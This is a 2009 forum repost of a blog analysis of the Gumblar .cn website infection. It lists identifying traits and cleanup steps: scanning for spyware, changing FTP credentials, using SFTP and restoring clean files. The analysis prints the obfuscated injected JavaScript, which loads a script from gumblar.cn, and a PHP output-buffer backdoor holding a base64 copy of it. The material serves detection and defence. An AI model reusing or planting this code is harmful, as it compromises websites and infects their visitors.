View Full Version : Gumblar .cn Exploit - 12 Facts About This Injected Script

24-05-2009, 00:17
Ngang qua blog của guardian có giới thiệu bài viết này để gỡ bỏ virus này ra khỏi website bị , mọi người tham khảo :
@ticsoft chẳng hạn :D

I’ve been watching this exploit for about a week now. During the last couple of days it became the prevailing problem detected by Unmask Parasites.( http://www.unmaskparasites.com/ )

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1. Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2. Every infected site has it’s own modification of the script. However every modification has common parts and can be easily identified as the gumblar .cn script.

1. The script starts with “(function(“
2. The function has no name. It is anonymous and self-invoking.
3. The script is obfuscated. I.e. some characters are replaced with their numeric codes, and then the “%” character replaced with some orbitrary character. Here are some sample excerpts of the encrypted data: “…20a.3d.22Sc.72iptEngin.65…“, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…“, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…“
4. Near the end of the script there is a “.replace(” function
5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /”/g or /~/g, etc. that will decrypt the mangled “%” character.

3. When the script is executed (every time someone visits the infected web page), another script from “gumblar . cn/rss/” is silently loaded and executed.

4. This code is usually injected right before the <body> tag. I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5. Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique. And probably the same clean up steps may be applied.
malicious iframes : http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
recent posts : http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/

6. Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page.
recent iframe exploits : http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

7. This script is also injected into .js (JavaScript) files. Usually at the very bottom.

8. Maybe it’s just a coincidence but about 95% of the infected sites used PHP. It is not possible to say for sure if the rest sites used PHP. Who knows.

9. This exploit doesn’t use some particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, on proprietary PHP sites.

10. Some people reported that the following code is injected into PHP files:
SMF : http://www.simplemachines.org/community/index.php?topic=308501.0
Magento : http://www.magentocommerce.com/boards/viewthread/41070/

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))
define(’TMP_XHGFJOKL’,base64_decode(’PHNjcml wdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvb igpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw 0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8M jI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV 1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8M jJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODw yMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZld DwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw 2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3N no8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDd iPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8N jluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzw yMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrY is8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjI pPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzc jw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJ lY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjP DVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUV vTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDa XopKX0pKCk7CiAtLT48L3NjcmlwdD4=’));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinfl ate(substr($s,10,-8));
foreach($a[0] as $v) if(count(explode(”\n”,$v))>5){
$e=preg_match(’#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v) || preg_match(’#[\(\[](\s*\d+,)20,}#’,$v);
$s1=preg_replace(’#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);
if(stristr($s,’<body’)) $s=preg_replace(’#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1 !=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp _lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler(’tmp_lkojfghx2′))!= tmp_lkojfghx2′)

The base64-encoded part is this gumblar .cn script.

This PHP code, it’s structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected javascript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.
fake Yahoo counter exploit : http://blog.unmaskparasites.com/2009/03/12/fake-yahoo-counter-script-unmasked/

11. This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12. Gumblar .cn domain is currently blacklisted by Google.


Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it, is replace them with clean files from a backup.

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…